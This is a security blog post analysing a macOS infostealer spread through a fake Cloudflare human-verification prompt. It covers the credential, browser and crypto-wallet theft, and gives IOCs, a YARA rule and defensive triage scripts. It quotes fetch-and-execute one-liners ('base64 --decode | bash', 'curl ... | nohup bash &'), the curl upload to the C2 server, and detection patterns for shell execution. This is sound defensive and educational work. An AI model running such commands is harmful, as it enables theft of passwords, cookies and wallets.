Highly Malicious MacOS Infostealer

Infostealer Alert

This morning, between meetings, I was researching prices for solar batteries and was redirected to a Cloudflare "are you human" page that then failed but asked me to open a terminal and paste in "I am human with a Cloudflare ID".

As soon as I saw this I knew it was bad, so I copied the output of the command, which was base64 encoded, into my go-to tool CyberChef!

Needless to say, the encoded string was not asking me if I was human! Instead it was attempting to get me to execute a script with malicious intent.

 

[Image: CyberChef base64-decoded string]
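The same decoding step, as an added example that is not part of the original post: a small Python inspector that peels the base64 layers off a pasted "verification" command and reports what it would do, without ever running it. It assumes the paste has the shape the comment thread on this post describes (echo '<base64>' | base64 --decode | bash); the sample command and its inner payload are constructed placeholders, not the real script.

```python
"""Inspect a pasted 'verification' command without running it.

Added example (not part of the original post). It assumes the pasted command
has the shape echo '<base64>' | base64 --decode | bash and peels the base64
layers off so the real payload can be read. SAMPLE_PASTE and INNER_PAYLOAD are
constructed placeholders; example.invalid never resolves.
"""
import base64
import binascii
import re

# Shell constructs that mean "fetch and/or execute"; seeing them in any layer is
# reason enough to refuse the paste.
EXEC_PATTERNS = {
    "pipe_to_shell": re.compile(r"\|\s*(nohup\s+)?(bash|zsh|sh)\b"),
    "base64_decode": re.compile(r"base64\s+(-d|-D|--decode)\b"),
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "eval_or_exec": re.compile(r"\b(eval|exec|osascript)\b"),
    "backgrounded": re.compile(r"\bnohup\b|&\s*$"),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_blobs(text):
    """Decode every base64-looking run in `text`; skip runs that do not decode."""
    decoded = []
    for match in B64_BLOB.finditer(text):
        blob = match.group(0)
        if len(blob) % 4:          # real base64 is padded to a multiple of 4
            continue
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def matched_patterns(text):
    """Names of the EXEC_PATTERNS that occur in `text`."""
    return [name for name, rx in EXEC_PATTERNS.items() if rx.search(text)]


def inspect_paste(command, max_depth=3):
    """Return the decoded layers, the execution patterns seen, and a verdict.

    layers[0] is the pasted text; each further entry is the payload hidden in
    the previous one. The function only reads strings; nothing is executed.
    """
    layers = [command]
    frontier = [command]
    for _ in range(max_depth):
        frontier = [p for text in frontier for p in decode_blobs(text)]
        if not frontier:
            break
        layers.extend(frontier)
    patterns = sorted({p for layer in layers for p in matched_patterns(layer)})
    suspicious = (
        "pipe_to_shell" in patterns
        or "eval_or_exec" in patterns
        or ("remote_fetch" in patterns and "base64_decode" in patterns)
    )
    return {"layers": layers, "patterns": patterns,
            "verdict": "suspicious" if suspicious else "clean"}


# Constructed stand-in for the prompt described in the post: the inner command
# is inert and exists only to show the decoding.
INNER_PAYLOAD = "curl -s https://example.invalid/stage | nohup bash &"
SAMPLE_PASTE = "echo '%s' | base64 --decode | bash" % base64.b64encode(
    INNER_PAYLOAD.encode()).decode()

if __name__ == "__main__":
    report = inspect_paste(SAMPLE_PASTE)
    for depth, layer in enumerate(report["layers"]):
        print("layer %d: %s" % (depth, layer))
    print("patterns:", ", ".join(report["patterns"]))
    print("verdict:", report["verdict"])
```

The verdict is deliberately conservative: a pipe into a shell, an eval/exec/osascript call, or a fetch combined with a base64 decode is enough to flag the paste, and the decoded layers are printed so the reader can see the hidden command for themselves.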

To anyone who may have unsuspectingly followed the prompts, this is what would have happened.

If the downloaded script had been left to run, it would have:

  • Stolen sensitive files (passwords, cookies, keychains, browser data).

  • Exfiltrated browser-stored credentials and cookies (Chrome, Firefox, Safari, Brave, etc.).

  • Extracted cryptocurrency wallet data (MetaMask, Electrum, Exodus, Binance, Ledger, Trezor, etc.).

  • Compressed the data into a ZIP file.

  • Exfiltrated the stolen data to a remote command and control (C2) server:
    https://meshsorterio[dot]com/api/data/receive

  • Deleted local traces of its activity afterward.

Detailed breakdown of the script functions

☠️ Malicious Functions and Behaviors

🛑 Credential Theft

  • getpwd() tries to access stored passwords or prompt the user for their macOS password via a fake dialog ("Application wants to install helper").

  • Uses dscl . authonly to validate entered credentials.

  • Stores password in ~/.pwd and /tmp/lovemrtrump/ggwp.

🛑 File and Wallet Exfiltration

  • GrabFolder() / readwrite() steal specific browser, wallet, and keychain files.

  • Targets wallets like MetaMask, Electrum, Exodus, Atomic, Wasabi, Monero, Ledger, Trezor, and more.

  • Also harvests files with sensitive extensions: .wallet, .key, .kdbx, .docx, .pdf, etc.

🛑 Safari, Chrome, Firefox Data Theft

  • chromium() and parseFF() functions target Chrome-like and Firefox-based browsers to extract:

    • Cookies

    • Login Data

    • IndexedDB storage

    • Extension data

  • Also targets Safari cookies and Notes app data.

🛑 Network Exfiltration

  • Uses curl to POST the stolen ZIP archive to:

https://meshsorterio[dot]com/api/data/receive

🛑 Evasion and Cleanup

  • Deletes /tmp/lovemrtrump/ and the exfiltration ZIP file after completion.

⚠️ Red Flags and Indicators of Compromise

  • Phishing-style prompt for macOS login password (display dialog)

  • Targeting of known wallet and credential files

  • Automated network exfiltration via cURL

  • Obfuscation using helper functions and exception lists

  • Hardcoded path /tmp/lovemrtrump/ used as staging area

  • C2 Domain: meshsorterio.com (suspicious, likely compromised or attacker-controlled)

🧯 If You’ve Found This Script on a System

  1. Disconnect from the network immediately

  2. Do NOT enter any password when prompted

  3. Scan system for IOCs (indicators of compromise):

    • /tmp/lovemrtrump/

    • ~/.pwd, ~/.username

    • Any file or directory created recently in Application Support, Library, Keychains

  4. Change passwords immediately, especially Apple ID and cryptocurrency wallets.

Below is a list of IOCs and a YARA rule to detect it:

🔍 Indicators of Compromise (IOCs)

🧠 Behavioral

| Indicator | Description |
|---|---|
| Prompt: "Required Application Helper. Please enter device password to continue." | Fake macOS password dialog |
| Folder: /tmp/lovemrtrump/ | Working/staging directory for stolen data |
| File: /tmp/out.zip | Compressed archive of stolen data |
| File: ~/.pwd | Stores captured macOS password |
| File: ~/.username | Stores current system username |
| File I/O into: Cookies.binarycookies, NoteStore.sqlite, login.keychain-db | Stolen Safari, Notes, and Keychain data |
| Extension harvesting: Chrome, Brave, Edge, Opera | Targets known extension and IndexedDB paths |
| Files harvested: .wallet, .key, .pdf, .docx, .kdbx, .txt, .jpeg, .jpg, etc. | Sensitive personal or crypto-related data |
| Tools used: curl, dscl, security, system_profiler, ditto | Built-in macOS command-line tools invoked by the script |

 

🌐 Network IOCs

| Type | Value |
|---|---|
| URL | https://meshsorterio[dot]com/api/data/receive |
| HTTP Header | X-Bid: f48fbe39836779cadbf148b5952919fd |
| HTTP Method | POST with multipart form (-F "lil-arch=@/tmp/out.zip") |
| User-agent | Unspecified, defaults to cURL |

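The network indicators above, turned into a check an analyst could run over a captured request. This is an added example, not code from the post: it assumes a raw HTTP/1.1 request as a proxy or packet capture would hand it over, and the two requests it contains are constructed (the indicator values are the ones in the table; the benign upload is there to show the check does not fire on every multipart POST).

```python
"""Flag the exfiltration POST described in the post in a captured HTTP request.

Added example, not code from the post. It assumes a raw HTTP/1.1 request
string; EXFIL_REQUEST and BENIGN_REQUEST below are constructed, and the
indicator constants come from the post's network IOC table.
"""
import re

C2_HOST = "meshsorterio.com"
C2_PATH = "/api/data/receive"
C2_XBID = "f48fbe39836779cadbf148b5952919fd"
C2_FORM_FIELD = "lil-arch"          # from: curl -F "lil-arch=@/tmp/out.zip"


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def exfil_indicators(raw):
    """Return the list of network IOCs the request matches, strongest first."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if headers.get("x-bid") == C2_XBID:
        hits.append("x-bid")
    if headers.get("host", "").lower() == C2_HOST:
        hits.append("host")
    if path == C2_PATH:
        hits.append("path")
    is_multipart = headers.get("content-type", "").startswith("multipart/form-data")
    if method == "POST" and is_multipart and re.search(
            r'name="%s"' % re.escape(C2_FORM_FIELD), body):
        hits.append("form-field")
    if headers.get("user-agent", "").startswith("curl/"):
        hits.append("curl-ua")      # weak on its own; curl is everywhere
    return hits


def is_exfil(raw):
    """The X-Bid value alone, or any two independent indicators, is a confident hit."""
    hits = exfil_indicators(raw)
    return "x-bid" in hits or len(hits) >= 2


# Constructed: what curl -F "lil-arch=@/tmp/out.zip" to the C2 URL puts on the wire.
EXFIL_REQUEST = (
    "POST /api/data/receive HTTP/1.1\r\n"
    "Host: meshsorterio.com\r\n"
    "User-Agent: curl/8.4.0\r\n"
    "Accept: */*\r\n"
    "X-Bid: f48fbe39836779cadbf148b5952919fd\r\n"
    "Content-Type: multipart/form-data; boundary=----------------------------c0ffee\r\n"
    "\r\n"
    "------------------------------c0ffee\r\n"
    'Content-Disposition: form-data; name="lil-arch"; filename="out.zip"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "PK\x03\x04<constructed zip bytes>\r\n"
    "------------------------------c0ffee--\r\n"
)

# Constructed benign upload from a browser, to show the check stays quiet on it.
BENIGN_REQUEST = (
    "POST /upload HTTP/1.1\r\n"
    "Host: files.example.invalid\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXyZ\r\n"
    "\r\n"
    "------WebKitFormBoundaryXyZ\r\n"
    'Content-Disposition: form-data; name="file"; filename="report.pdf"\r\n'
    "Content-Type: application/pdf\r\n"
    "\r\n"
    "%PDF-1.7 <constructed>\r\n"
    "------WebKitFormBoundaryXyZ--\r\n"
)

if __name__ == "__main__":
    for label, req in (("exfil", EXFIL_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, exfil_indicators(req), "->", "EXFIL" if is_exfil(req) else "ok")
```

The X-Bid value is the strongest single indicator because it is attacker-chosen and has no business being in ordinary traffic; the host and path are the ones to block at the proxy, and the form-field name catches the same tooling if the domain changes.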

🧪 File Paths (Stolen Targets)

Some examples among many:

  • ~/Library/Application Support/Google/Chrome/...
  • ~/Library/Application Support/BraveSoftware/Brave-Browser/...
  • ~/Library/Application Support/atomic/Local Storage/leveldb/
  • ~/Library/Application Support/Exodus/
  • ~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite
  • ~/Library/Keychains/login.keychain-db
  • ~/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies

🔐 YARA Rule

Here is a YARA rule tailored to detect this specific AppleScript on disk or in memory:

```yara
rule OSX_CryptoStealer_Lovemrtrump
{
    meta:
        description = "Detects macOS AppleScript-based crypto wallet and password stealer"
        author = "Cyooda Security"
        date = "2025-06-18"
        malware_family = "OSX.Lovemrtrump.Stealer"
        threat_level = 5

    strings:
        $str1 = "Application wants to install helper"
        $str2 = "/tmp/lovemrtrump/"
        $str3 = "/tmp/out.zip"
        $str4 = "Cookies.binarycookies"
        $str5 = "NoteStore.sqlite"
        $str6 = "login.keychain-db"
        $str7 = "https://meshsorterio.com/api/data/receive"
        $str8 = "set result to do shell script \"dscl . authonly"
        $str9 = "MetaMask"
        $str10 = "display dialog"

    condition:
        6 of ($str*)
}
```
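A host-triage script that covers both the "If You've Found This Script on a System" checklist and the YARA rule above, as an added example that is not code from the post or from Cyooda Security. It checks the staging paths the post names and emulates the rule's "6 of ($str*)" condition in plain Python, so it runs where no yara binary is installed; the sample tree it builds is constructed evidence (a staging directory, a stub archive, a captured-password file and a text file carrying seven of the rule strings), never the real script.

```python
"""Host triage for the file-system IOCs and YARA strings listed in the post.

Added example, not code from the post or from Cyooda Security. It checks the
staging paths the post names and emulates the YARA rule's condition ("6 of"
the ten strings) in pure Python. build_sample_tree() creates constructed
evidence under a temp directory; no real malware is involved.
"""
import os
import tempfile
from pathlib import Path

# File-system indicators quoted in the post. "~" is expanded against the home
# directory passed to iocs_present(), so the same code works on a live host
# (root="/", home=os.path.expanduser("~")) and on the constructed tree below.
PATH_IOCS = ["/tmp/lovemrtrump/", "/tmp/out.zip", "~/.pwd", "~/.username"]

# The ten strings from the post's YARA rule; its condition is "6 of ($str*)".
RULE_STRINGS = [
    "Application wants to install helper",
    "/tmp/lovemrtrump/",
    "/tmp/out.zip",
    "Cookies.binarycookies",
    "NoteStore.sqlite",
    "login.keychain-db",
    "https://meshsorterio.com/api/data/receive",
    'set result to do shell script "dscl . authonly',
    "MetaMask",
    "display dialog",
]
RULE_THRESHOLD = 6


def iocs_present(root, home):
    """Return the IOC paths that exist under `root`, with "~" mapped to `home`."""
    hits = []
    for ioc in PATH_IOCS:
        rel = home + ioc[1:] if ioc.startswith("~") else ioc
        if (Path(root) / rel.lstrip("/")).exists():
            hits.append(ioc)
    return hits


def rule_matches(data):
    """Emulate the YARA condition on raw bytes: (matched?, strings found)."""
    found = [s for s in RULE_STRINGS if s.encode() in data]
    return len(found) >= RULE_THRESHOLD, found


def scan_tree(root, max_size=5_000_000):
    """Walk `root` and return (path, strings found) for every file the rule flags."""
    flagged = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = Path(dirpath) / name
            try:
                if path.is_symlink() or path.stat().st_size > max_size:
                    continue
                data = path.read_bytes()
            except OSError:
                continue
            matched, found = rule_matches(data)
            if matched:
                flagged.append((str(path), found))
    return flagged


def build_sample_tree():
    """Constructed evidence: staging dir, stub archive, captured-password file,
    a script carrying seven rule strings, and a benign note mentioning two."""
    root = Path(tempfile.mkdtemp(prefix="triage-"))
    home = "/Users/alice"                      # constructed user
    (root / "tmp/lovemrtrump").mkdir(parents=True)
    (root / "tmp/out.zip").write_bytes(b"PK\x03\x04")     # zip magic only
    user = root / home.lstrip("/")
    user.mkdir(parents=True)
    (user / ".pwd").write_text("not-a-real-password\n")
    scpt = user / "Library/helper.scpt"
    scpt.parent.mkdir(parents=True)
    scpt.write_text("\n".join(RULE_STRINGS[:7]) + "\n")    # 7 of 10: rule fires
    note = user / "Documents/notes.txt"
    note.parent.mkdir(parents=True)
    note.write_text("Back up the MetaMask seed; ask about the display dialog bug\n")
    return str(root), home


if __name__ == "__main__":
    root, home = build_sample_tree()
    print("IOC paths present:", iocs_present(root, home))
    for path, found in scan_tree(root):
        print("rule hit:", path, "(%d strings)" % len(found))
```

The benign note mentions two rule strings and stays quiet, which is the point of the "6 of" threshold: single strings such as "display dialog" or "MetaMask" are common in legitimate files. On a live host the scan is read-only and skips symlinks and large files, so it is safe to run before deciding whether to image the machine.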

Conclusion

Although this script was written for an Apple Mac, similar versions also exist for Microsoft Windows computers. Be on the lookout for this, and if you see it and it feels suspicious, do not open a command prompt and type in whatever it tells you.

About John Reeman

John Reeman is the CEO and Founder of Cyooda Security, an independent cybersecurity and digital forensics consultancy based in Sydney. He is the former CISO of King & Wood Mallesons, with 30 years of cybersecurity leadership protecting organisations from data breaches, ransomware, and cyber espionage.

2 Comments

  1. John on June 19, 2025 at 4:15 pm

    How does the terminal convert the base64 string into a command? This makes no sense

    • John on June 30, 2025 at 11:22 am

      Because the base64 decoded string was similar to this: echo 'Y3VybCAtcyBodHRwczovL2N5b29kYS5jb20=' | base64 --decode | bash – which then executed the decoded string.

      The decoded string being: curl https:’dodgywebsite’/script |nohup bash &
